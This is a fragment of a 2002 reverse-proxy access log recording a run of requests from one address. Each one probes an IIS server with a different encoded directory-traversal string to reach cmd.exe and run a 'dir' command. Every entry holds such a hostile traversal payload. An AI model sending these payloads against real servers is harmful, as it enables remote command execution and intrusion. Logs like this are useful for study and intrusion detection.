GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:50 W3ReverseProxy SERVER99 - www - - - 98 - - GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.39.223.248 anonymous - N 2002-02-12 21:16:52 W3ReverseProxy SERVER99 - www - - 10 96 - - GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.39.223.248 anonymous - N 2002-02-12 21:16:54 W3ReverseProxy SERVER99 - www - - - 100 - - GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:56 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule -
